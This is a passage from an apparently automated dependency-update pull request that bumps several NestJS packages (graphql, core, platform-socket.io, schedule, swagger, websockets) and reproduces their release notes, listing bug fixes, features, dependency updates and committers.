[@nestjs/platform-socket.io](https://nestjs.com) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/platform-socket.io)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fplatform-socket.io/11.1.18/11.1.20) |  |  | | [@nestjs/schedule](https://redirect.github.com/nestjs/schedule) | [`6.1.1` → `6.1.3`](https://renovatebot.com/diffs/npm/@nestjs%2fschedule/6.1.1/6.1.3) |  |  | | [@nestjs/swagger](https://redirect.github.com/nestjs/swagger) | [`11.2.7` → `11.4.2`](https://renovatebot.com/diffs/npm/@nestjs%2fswagger/11.2.7/11.4.2) |  |  | | [@nestjs/websockets](https://redirect.github.com/nestjs/nest) ([source](https://redirect.github.com/nestjs/nest/tree/HEAD/packages/websockets)) | [`11.1.18` → `11.1.20`](https://renovatebot.com/diffs/npm/@nestjs%2fwebsockets/11.1.18/11.1.20) |  |  | --- ### Release Notes <details> <summary>nestjs/graphql (@​nestjs/apollo)</summary> ### [`v13.4.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.4.0) [Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.3.0...v13.4.0) #### 13.4.0 (2026-04-30) ##### Features - `apollo`, `graphql`, `mercurius` - [#​3811](https://redirect.github.com/nestjs/graphql/pull/3811) feat(graphql): Add registerIn option for module-scoped type filtering ([@​joe-re](https://redirect.github.com/joe-re)) ##### Bug fixes - `graphql` - [#​3959](https://redirect.github.com/nestjs/graphql/pull/3959) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): stop double-registering PickType inputs ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3960](https://redirect.github.com/nestjs/graphql/pull/3960) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): de-duplicate per-target metadata in TargetMetadataCollection ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - `apollo`, `graphql` - [#​3962](https://redirect.github.com/nestjs/graphql/pull/3962) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): restore Timestamp scalar parsers in federation factory ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ##### Enhancements - `graphql` - [#​3963](https://redirect.github.com/nestjs/graphql/pull/3963) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): validate registerEnumType/createUnionType options eagerly ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ##### Dependencies - `graphql` - [#​3954](https://redirect.github.com/nestjs/graphql/pull/3954) fix(deps): update graphql-tools monorepo ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) ##### Committers: 3 - Masato Noguchi ([@​joe-re](https://redirect.github.com/joe-re)) - Mateus Welter Goettems ([@​mateuswgoettems](https://redirect.github.com/mateuswgoettems)) - Yogeshwaran C ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ### [`v13.3.0`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.3.0) [Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.5...v13.3.0) #### 13.3.0 (2026-04-22) ##### Bug fixes - `graphql` - [#​3949](https://redirect.github.com/nestjs/graphql/pull/3949) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): count args for parenless arrow functions ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3952](https://redirect.github.com/nestjs/graphql/pull/3952) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): keep class directive when a field has the same SDL ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3946](https://redirect.github.com/nestjs/graphql/pull/3946) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): emit enum key for Args defaultValue in generated SDL ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3934](https://redirect.github.com/nestjs/graphql/pull/3934) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): treat single-key string enums as enums in plugin type detection ([@​maruthang](https://redirect.github.com/maruthang)) - [#​3939](https://redirect.github.com/nestjs/graphql/pull/3939) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): preserve ResolveField options for all overloads ([@​maruthang](https://redirect.github.com/maruthang)) - `apollo` - [#​3940](https://redirect.github.com/nestjs/graphql/pull/3940) fix(apollo): preserve HTTP 200 for execution-level GraphQL errors ([@​maruthang](https://redirect.github.com/maruthang)) ##### Enhancements - `graphql` - [#​3838](https://redirect.github.com/nestjs/graphql/pull/3838) perf(graphql): bypass ExternalContextCreator for scalar ResolveField fast-path ([@​ArielSafar](https://redirect.github.com/ArielSafar)) - [#​3950](https://redirect.github.com/nestjs/graphql/pull/3950) feat([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): forward specifiedByURL and extensions on custom scalars ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3951](https://redirect.github.com/nestjs/graphql/pull/3951) feat([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): accept array of SDL strings in [@​Directive](https://redirect.github.com/Directive) ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3944](https://redirect.github.com/nestjs/graphql/pull/3944) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): emit clearer error when nested object type is used in mapped input ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3943](https://redirect.github.com/nestjs/graphql/pull/3943) feat([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): add conditional exports for browser shim ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3942](https://redirect.github.com/nestjs/graphql/pull/3942) feat([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): default federation to v2.12 directives ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) - [#​3936](https://redirect.github.com/nestjs/graphql/pull/3936) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): allow CustomScalar methods to return null ([@​maruthang](https://redirect.github.com/maruthang)) - `apollo`, `graphql` - [#​3948](https://redirect.github.com/nestjs/graphql/pull/3948) feat([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): support directives on enums and unions ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ##### Dependencies - `graphql` - [#​3925](https://redirect.github.com/nestjs/graphql/pull/3925) chore(deps): update dependency ts-morph to v28 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3918](https://redirect.github.com/nestjs/graphql/pull/3918) fix(deps): update graphql-tools monorepo ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - `mercurius` - [#​3928](https://redirect.github.com/nestjs/graphql/pull/3928) chore(deps): update dependency fastify to v5.8.5 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3858](https://redirect.github.com/nestjs/graphql/pull/3858) chore(deps): update dependency [@​mercuriusjs/gateway](https://redirect.github.com/mercuriusjs/gateway) to v5.2.0 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3920](https://redirect.github.com/nestjs/graphql/pull/3920) chore(deps): update dependency mercurius to v16.9.0 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) ##### Committers: 3 - Ariel Safar ([@​ArielSafar](https://redirect.github.com/ArielSafar)) - Maruthan G ([@​maruthang](https://redirect.github.com/maruthang)) - Yogeshwaran C ([@​yogeshwaran-c](https://redirect.github.com/yogeshwaran-c)) ### [`v13.2.5`](https://redirect.github.com/nestjs/graphql/releases/tag/v13.2.5) [Compare Source](https://redirect.github.com/nestjs/graphql/compare/v13.2.4...v13.2.5) ##### 13.2.5 (2026-04-09) ##### Bug fixes - `graphql` - [#​3846](https://redirect.github.com/nestjs/graphql/pull/3846) fix([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): handle definitions factory typename option ([@​NicolasGn](https://redirect.github.com/NicolasGn)) ##### Enhancements - `graphql` - [#​3889](https://redirect.github.com/nestjs/graphql/pull/3889) feat([@​nestjs/graphql](https://redirect.github.com/nestjs/graphql)): add stopOnApplicationShutdown option for graceful shutdown ([@​dgfh0450](https://redirect.github.com/dgfh0450)) ##### Dependencies - `graphql` - [#​3894](https://redirect.github.com/nestjs/graphql/pull/3894) fix(deps): update dependency graphql-ws to v6.0.8 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3852](https://redirect.github.com/nestjs/graphql/pull/3852) chore(deps): update dependency graphql to v16.13.2 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3888](https://redirect.github.com/nestjs/graphql/pull/3888) fix(deps): update dependency ws to v8.20.0 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3901](https://redirect.github.com/nestjs/graphql/pull/3901) fix(deps): update dependency [@​nestjs/mapped-types](https://redirect.github.com/nestjs/mapped-types) to v2.1.1 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3904](https://redirect.github.com/nestjs/graphql/pull/3904) fix(deps): update dependency lodash to v4.18.1 \[security] ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - `apollo` - [#​3902](https://redirect.github.com/nestjs/graphql/pull/3902) fix(deps): update dependency lodash.omit to v4.18.0 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3897](https://redirect.github.com/nestjs/graphql/pull/3897) chore(deps): update dependency [@​apollo/server](https://redirect.github.com/apollo/server) to v5.5.0 \[security] ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3881](https://redirect.github.com/nestjs/graphql/pull/3881) chore(deps): update dependency [@​apollo/gateway](https://redirect.github.com/apollo/gateway) to v2.10.5 \[security] ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - `mercurius` - [#​3899](https://redirect.github.com/nestjs/graphql/pull/3899) chore(deps): update dependency [@​mercuriusjs/federation](https://redirect.github.com/mercuriusjs/federation) to v5.1.1 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3890](https://redirect.github.com/nestjs/graphql/pull/3890) chore(deps): update dependency fastify to v5.8.4 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) - [#​3868](https://redirect.github.com/nestjs/graphql/pull/3868) chore(deps): update dependency mercurius to v16.8.0 ([@​renovate\[bot\]](https://redirect.github.com/apps/renovate)) ##### Committers: 2 - Nicolas Guégan ([@​NicolasGn](https://redirect.github.com/NicolasGn)) - YoonDH ([@​dgfh0450](https://redirect.github.com/dgfh0450)) </details> <details> <summary>nestjs/nest (@​nestjs/common)</summary> ### [`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20) ### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19) #### v11.1.19 (2026-04-13) ##### Bug fixes - `microservices` - [#​16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - [#​16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ##### Committers: 2 - Burhan Haroon⚡ ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) </details> <details> <summary>nestjs/nest (@​nestjs/core)</summary> ### [`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20) ### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19) ##### v11.1.19 (2026-04-13) ##### Bug fixes - `microservices` - [#​16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - [#​16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ##### Committers: 2 - Burhan Haroon⚡ ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) </details> <details> <summary>nestjs/nest (@​nestjs/platform-express)</summary> ### [`v11.1.20`](https://redirect.github.com/nestjs/nest/compare/v11.1.19...7caeb3fb70de81085c4c3e8502a2a0e62e4f8eda) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20) ### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19) ##### v11.1.19 (2026-04-13) ##### Bug fixes - `microservices` - [#​16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - [#​16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ##### Committers: 2 - Burhan Haroon⚡ ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) </details> <details> <summary>nestjs/nest (@​nestjs/platform-socket.io)</summary> ### [`v11.1.20`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.20) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.19...v11.1.20) ##### v11.1.20 (2026-05-13) ##### Bug fixes - `core`, `testing` - [#​16939](https://redirect.github.com/nestjs/nest/pull/16939) fix(core): fix deeply nested transient providers resolution ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) - `core` - [#​16861](https://redirect.github.com/nestjs/nest/pull/16861) fix(core): fix [@​Sse](https://redirect.github.com/Sse) losing events on complete ([@​MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer)) - [#​16753](https://redirect.github.com/nestjs/nest/pull/16753) fix(core): defer sse writehead until after lifecycle completes ([@​jkalberer](https://redirect.github.com/jkalberer)) - [#​16782](https://redirect.github.com/nestjs/nest/pull/16782) fix(core): use strict null check for SSE message id ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - `microservices` - [#​16850](https://redirect.github.com/nestjs/nest/pull/16850) fix(microservices): ServerRMQ crashes at boot when [@​MessagePattern](https://redirect.github.com/MessagePattern)(undefined) is combined with wildcards: true ([@​lavieennoir](https://redirect.github.com/lavieennoir)) - `common` - [#​16845](https://redirect.github.com/nestjs/nest/pull/16845) fix(common): accept zero timestamp in parse date pipe ([@​Mysh3ll](https://redirect.github.com/Mysh3ll)) - `platform-socket.io` - [#​16742](https://redirect.github.com/nestjs/nest/pull/16742) fix(socket.io): Deduplicate disconnect listener in bindMessageHandlers ([@​fru1tworld](https://redirect.github.com/fru1tworld)) ##### Enhancements - `microservices` - [#​16676](https://redirect.github.com/nestjs/nest/pull/16676) feat(microservices): add return buffers option for binary data ([@​Forceres](https://redirect.github.com/Forceres)) - [#​16826](https://redirect.github.com/nestjs/nest/pull/16826) feat(microservices): handle rmq blocked/unblocked connection events ([@​thisalihassan](https://redirect.github.com/thisalihassan)) - `common` - [#​16902](https://redirect.github.com/nestjs/nest/pull/16902) fix(common): filetype validator buffer message ([@​QusaiAlbonni](https://redirect.github.com/QusaiAlbonni)) - `platform-express` - [#​16844](https://redirect.github.com/nestjs/nest/pull/16844) feat(platform-express): add defParamCharset to MulterOptions ([@​starnayuta](https://redirect.github.com/starnayuta)) ##### Dependencies - `platform-ws` - [#​16941](https://redirect.github.com/nestjs/nest/pull/16941) chore(deps): bump ws from 8.20.0 to 8.20.1 ([@​dependabot\[bot\]](https://redirect.github.com/apps/dependabot)) ##### Committers: 13 - Ali Hassan ([@​thisalihassan](https://redirect.github.com/thisalihassan)) - Burhan Haroon⚡ ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - Dmytro Khyzhniak ([@​lavieennoir](https://redirect.github.com/lavieennoir)) - Harsh Rathod ([@​harshrathod50](https://redirect.github.com/harshrathod50)) - IlyaCredo ([@​Forceres](https://redirect.github.com/Forceres)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) - Mysh3ll ([@​Mysh3ll](https://redirect.github.com/Mysh3ll)) - [@​MatthiasBrehmer](https://redirect.github.com/MatthiasBrehmer) - [@​QusaiAlbonni](https://redirect.github.com/QusaiAlbonni) - [@​jkalberer](https://redirect.github.com/jkalberer) - [@​pazaderey](https://redirect.github.com/pazaderey) - fru1tworld ([@​fru1tworld](https://redirect.github.com/fru1tworld)) - starnayuta ([@​starnayuta](https://redirect.github.com/starnayuta)) ### [`v11.1.19`](https://redirect.github.com/nestjs/nest/releases/tag/v11.1.19) [Compare Source](https://redirect.github.com/nestjs/nest/compare/v11.1.18...v11.1.19) #### v11.1.19 (2026-04-13) ##### Bug fixes - `microservices` - [#​16762](https://redirect.github.com/nestjs/nest/pull/16762) fix(microservices): use backing field for consumer CRASH event listener ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - [#​16764](https://redirect.github.com/nestjs/nest/pull/16764) fix(microservices): prevent stack overflow in jsonsocket.handledata() ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) ##### Committers: 2 - Burhan Haroon⚡ ([@​burhanharoon](https://redirect.github.com/burhanharoon)) - Kamil Mysliwiec ([@​kamilmysliwiec](https://redirect.github.com/kamilmysliwiec)) </details> <details> <summary>nestjs/schedule (@​nestjs/schedule)</summary> ### [`v6.1.3`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.3) [Compare Source](https://redirect.github.com/nestjs/schedule/compare/6.1.2...6.1.3) #### What's Changed - feat(cron): add initialDelay option to defer first job execution by [@​kyungseopk1m](https://redirect.github.com/kyungseopk1m) in [#​2251](https://redirect.github.com/nestjs/schedule/pull/2251) **Full Changelog**: <https://github.com/nestjs/schedule/compare/6.1.2...6.1.3> ### [`v6.1.2`](https://redirect.github.com/nestjs/schedule/releases/tag/6.1.2) [Compare Source](https://redirect.github.com/nestjs/schedule/compare/6.1.1...6.1.2) - Merge pull request [#​2247](https://redirect.github.com/nestjs/schedule/issues/2247) from kyungseopk1m/feat/cron-initial-delay ([`a57ce2c`](https://redirect.github.com/nestjs/schedule/commit/a57ce2c)) - chore(deps): update dependency prettier to v3.8.3 ([#​2248](https://redirect.github.com/nestjs/schedule/issues/2248)) ([`bb3490d`](https://redirect.github.com/nestjs/schedule/commit/bb3490d)) - feat(cron): add initialDelay option to defer first job execution ([`1c5677f`](https://redirect.github.com/nestjs/schedule/commit/1c5677f)) - Merge pull request [#​2245](https://redirect.github.com/nestjs/schedule/issues/2245) from nestjs/renovate/nest-monorepo ([`59046bd`](https://redirect.github.com/nestjs/schedule/commit/59046bd)) - Merge pull request [#​2246](https://redirect.github.com/nestjs/schedule/issues/2246) from nestjs/renovate/oxlint-monorepo ([`be4eee3`](https://redirect.github.com/nestjs/schedule/commit/be4eee3)) - chore(deps): update dependency oxlint to v1.60.0 ([`32a9ce2`](https://redirect.github.com/nestjs/schedule/commit/32a9ce2)) - chore(deps): update nest monorepo to v11.1.19 ([`7d3844f`](https://redirect.github.com/nestjs/schedule/commit/7d3844f)) - chore: migrate to oxlint, vitest, ts6 ([`29de71b`](https://redirect.github.com/nestjs/schedule/commit/29de71b)) - chore(deps): update dependency globals to v17.5.0 ([#​2244](https://redirect.github.com/nestjs/schedule/issues/2244)) ([`6c62cca`](https://redirect.github.com/nestjs/schedule/commit/6c62cca)) - chore(deps): update dependency sinon to v21.1.2 ([#​2243](https://redirect.github.com/nestjs/schedule/issues/2243)) ([`ee3b31a`](https://redirect.github.com/nestjs/schedule/commit/ee3b31a)) - chore(deps): update dependency sinon to v21.1.1 ([#​2241](https://redirect.github.com/nestjs/schedule/issues/2241)) ([`eba9799`](https://redirect.github.com/nestjs/schedule/commit/eba9799)) - Merge pull request [#​2242](https://redirect.github.com/nestjs/schedule/issues/2242) from nestjs/renovate/prettier-3.x ([`c3ad0f7`](https://redirect.github.com/nestjs/schedule/commit/c3ad0f7)) - chore(deps): update dependency prettier to v3.8.2 ([`798e2a9`](https://redirect.github.com/nestjs/schedule/commit/798e2a9)) - Merge pull request [#​2199](https://redirect.github.com/nestjs/schedule/issues/2199) from nestjs/renovate/cimg-node-24.x ([`a05354a`](https://redirect.github.com/nestjs/schedule/commit/a05354a)) - chore(deps): update dependency typescript-eslint to v8.58.1 ([#​2240](https://redirect.github.com/nestjs/schedule/issues/2240)) ([`0367ac1`](https://redirect.github.com/nestjs/schedule/commit/0367ac1)) - chore(deps): update dependency eslint to v10.2.0 ([#​2239](https://redirect.github.com/nestjs/schedule/issues/2239)) ([`fa93e06`](https://redirect.github.com/nestjs/schedule/commit/fa93e06)) - chore(deps): update nest monorepo to v11.1.18 ([#​2238](https://redirect.github.com/nestjs/schedule/issues/2238)) ([`8cd4c02`](https://redirect.github.com/nestjs/schedule/commit/8cd4c02)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.12.2 ([#​2237](https://redirect.github.com/nestjs/schedule/issues/2237)) ([`01482df`](https://redirect.github.com/nestjs/schedule/commit/01482df)) - chore(deps): update dependency [@​types/sinon](https://redirect.github.com/types/sinon) to v21.0.1 ([#​2236](https://redirect.github.com/nestjs/schedule/issues/2236)) ([`f05b5bd`](https://redirect.github.com/nestjs/schedule/commit/f05b5bd)) - chore(deps): update dependency ts-jest to v29.4.9 ([#​2235](https://redirect.github.com/nestjs/schedule/issues/2235)) ([`af545e6`](https://redirect.github.com/nestjs/schedule/commit/af545e6)) - chore(deps): update dependency typescript-eslint to v8.58.0 ([#​2233](https://redirect.github.com/nestjs/schedule/issues/2233)) ([`4dad22a`](https://redirect.github.com/nestjs/schedule/commit/4dad22a)) - chore(deps): update node.js to v24.14.1 ([`28db9bc`](https://redirect.github.com/nestjs/schedule/commit/28db9bc)) - chore(deps): update dependency eslint to v10.1.0 ([#​2232](https://redirect.github.com/nestjs/schedule/issues/2232)) ([`413f390`](https://redirect.github.com/nestjs/schedule/commit/413f390)) - chore(deps): update nest monorepo to v11.1.17 ([#​2230](https://redirect.github.com/nestjs/schedule/issues/2230)) ([`46c2bc5`](https://redirect.github.com/nestjs/schedule/commit/46c2bc5)) - chore(deps): update dependency typescript-eslint to v8.57.1 ([#​2231](https://redirect.github.com/nestjs/schedule/issues/2231)) ([`8fd063b`](https://redirect.github.com/nestjs/schedule/commit/8fd063b)) - chore(deps): update dependency sinon to v21.0.3 ([#​2229](https://redirect.github.com/nestjs/schedule/issues/2229)) ([`1671ad9`](https://redirect.github.com/nestjs/schedule/commit/1671ad9)) - chore(deps): update commitlint monorepo to v20.5.0 ([#​2228](https://redirect.github.com/nestjs/schedule/issues/2228)) ([`2ecd2f1`](https://redirect.github.com/nestjs/schedule/commit/2ecd2f1)) - chore(deps): update dependency lint-staged to v16.4.0 ([#​2227](https://redirect.github.com/nestjs/schedule/issues/2227)) ([`aa0de01`](https://redirect.github.com/nestjs/schedule/commit/aa0de01)) - chore(deps): update commitlint monorepo to v20.4.4 ([#​2226](https://redirect.github.com/nestjs/schedule/issues/2226)) ([`75034fe`](https://redirect.github.com/nestjs/schedule/commit/75034fe)) - chore(deps): update dependency lint-staged to v16.3.3 ([#​2225](https://redirect.github.com/nestjs/schedule/issues/2225)) ([`f1c7d31`](https://redirect.github.com/nestjs/schedule/commit/f1c7d31)) - chore(deps): update dependency jest to v30.3.0 ([#​2224](https://redirect.github.com/nestjs/schedule/issues/2224)) ([`1a208d4`](https://redirect.github.com/nestjs/schedule/commit/1a208d4)) - chore(deps): update dependency typescript-eslint to v8.57.0 ([#​2223](https://redirect.github.com/nestjs/schedule/issues/2223)) ([`60dd2c9`](https://redirect.github.com/nestjs/schedule/commit/60dd2c9)) - chore(deps): update dependency eslint to v10.0.3 ([#​2221](https://redirect.github.com/nestjs/schedule/issues/2221)) ([`791b6ba`](https://redirect.github.com/nestjs/schedule/commit/791b6ba)) - chore(deps): update dependency [@​eslint/eslintrc](https://redirect.github.com/eslint/eslintrc) to v3.3.5 ([#​2220](https://redirect.github.com/nestjs/schedule/issues/2220)) ([`0da1ca7`](https://redirect.github.com/nestjs/schedule/commit/0da1ca7)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.12.0 ([#​2219](https://redirect.github.com/nestjs/schedule/issues/2219)) ([`934a93e`](https://redirect.github.com/nestjs/schedule/commit/934a93e)) - chore(deps): update nest monorepo to v11.1.16 ([#​2218](https://redirect.github.com/nestjs/schedule/issues/2218)) ([`5f44e9b`](https://redirect.github.com/nestjs/schedule/commit/5f44e9b)) - chore(deps): update dependency sinon to v21.0.2 ([#​2217](https://redirect.github.com/nestjs/schedule/issues/2217)) ([`b807746`](https://redirect.github.com/nestjs/schedule/commit/b807746)) - chore(deps): update dependency lint-staged to v16.3.2 ([#​2216](https://redirect.github.com/nestjs/schedule/issues/2216)) ([`4ca32bd`](https://redirect.github.com/nestjs/schedule/commit/4ca32bd)) - chore(deps): update commitlint monorepo to v20.4.3 ([#​2215](https://redirect.github.com/nestjs/schedule/issues/2215)) ([`d3ceb76`](https://redirect.github.com/nestjs/schedule/commit/d3ceb76)) - chore(deps): update nest monorepo to v11.1.15 ([#​2214](https://redirect.github.com/nestjs/schedule/issues/2214)) ([`b084ffc`](https://redirect.github.com/nestjs/schedule/commit/b084ffc)) - chore(deps): update dependency lint-staged to v16.3.1 ([#​2213](https://redirect.github.com/nestjs/schedule/issues/2213)) ([`8a201b2`](https://redirect.github.com/nestjs/schedule/commit/8a201b2)) - chore(deps): update dependency globals to v17.4.0 ([#​2212](https://redirect.github.com/nestjs/schedule/issues/2212)) ([`6f61793`](https://redirect.github.com/nestjs/schedule/commit/6f61793)) - chore(deps): update dependency lint-staged to v16.3.0 ([#​2211](https://redirect.github.com/nestjs/schedule/issues/2211)) ([`aa9213a`](https://redirect.github.com/nestjs/schedule/commit/aa9213a)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.11.0 ([#​2210](https://redirect.github.com/nestjs/schedule/issues/2210)) ([`c70b928`](https://redirect.github.com/nestjs/schedule/commit/c70b928)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.10.15 ([#​2209](https://redirect.github.com/nestjs/schedule/issues/2209)) ([`0f596b9`](https://redirect.github.com/nestjs/schedule/commit/0f596b9)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.10.14 ([#​2208](https://redirect.github.com/nestjs/schedule/issues/2208)) ([`dac8cca`](https://redirect.github.com/nestjs/schedule/commit/dac8cca)) - chore(deps): update dependency eslint to v10.0.2 ([#​2207](https://redirect.github.com/nestjs/schedule/issues/2207)) ([`abe6fce`](https://redirect.github.com/nestjs/schedule/commit/abe6fce)) - chore(deps): update dependency [@​eslint/eslintrc](https://redirect.github.com/eslint/eslintrc) to v3.3.4 ([#​2206](https://redirect.github.com/nestjs/schedule/issues/2206)) ([`cb32a40`](https://redirect.github.com/nestjs/schedule/commit/cb32a40)) - chore(deps): update dependency typescript-eslint to v8.56.1 ([#​2205](https://redirect.github.com/nestjs/schedule/issues/2205)) ([`88e1e6c`](https://redirect.github.com/nestjs/schedule/commit/88e1e6c)) - chore(deps): update dependency eslint to v10.0.1 ([#​2204](https://redirect.github.com/nestjs/schedule/issues/2204)) ([`55e5406`](https://redirect.github.com/nestjs/schedule/commit/55e5406)) - chore(deps): update commitlint monorepo to v20.4.2 ([#​2203](https://redirect.github.com/nestjs/schedule/issues/2203)) ([`4e55d62`](https://redirect.github.com/nestjs/schedule/commit/4e55d62)) - chore(deps): update nest monorepo to v11.1.14 ([#​2202](https://redirect.github.com/nestjs/schedule/issues/2202)) ([`d23ea1a`](https://redirect.github.com/nestjs/schedule/commit/d23ea1a)) - chore(deps): update eslint monorepo to v10 ([#​2195](https://redirect.github.com/nestjs/schedule/issues/2195)) ([`c2fcbc3`](https://redirect.github.com/nestjs/schedule/commit/c2fcbc3)) - chore(deps): update dependency typescript-eslint to v8.56.0 ([#​2201](https://redirect.github.com/nestjs/schedule/issues/2201)) ([`a93ebc4`](https://redirect.github.com/nestjs/schedule/commit/a93ebc4)) - chore(deps): update dependency rimraf to v6.1.3 ([#​2200](https://redirect.github.com/nestjs/schedule/issues/2200)) ([`1906e80`](https://redirect.github.com/nestjs/schedule/commit/1906e80)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.10.13 ([#​2198](https://redirect.github.com/nestjs/schedule/issues/2198)) ([`244cb84`](https://redirect.github.com/nestjs/schedule/commit/244cb84)) - chore(deps): update dependency typescript-eslint to v8.55.0 ([#​2197](https://redirect.github.com/nestjs/schedule/issues/2197)) ([`6b00083`](https://redirect.github.com/nestjs/schedule/commit/6b00083)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.10.12 ([#​2196](https://redirect.github.com/nestjs/schedule/issues/2196)) ([`b310c95`](https://redirect.github.com/nestjs/schedule/commit/b310c95)) - chore(deps): update dependency [@​types/node](https://redirect.github.com/types/node) to v24.10.11 ([#​2194](https://redirect.github.com/nestjs/schedule/issues/2194)) ([`d05dca5`](https://redirect.github.com/nestjs/schedule/commit/d05dca5)) </details> <details> 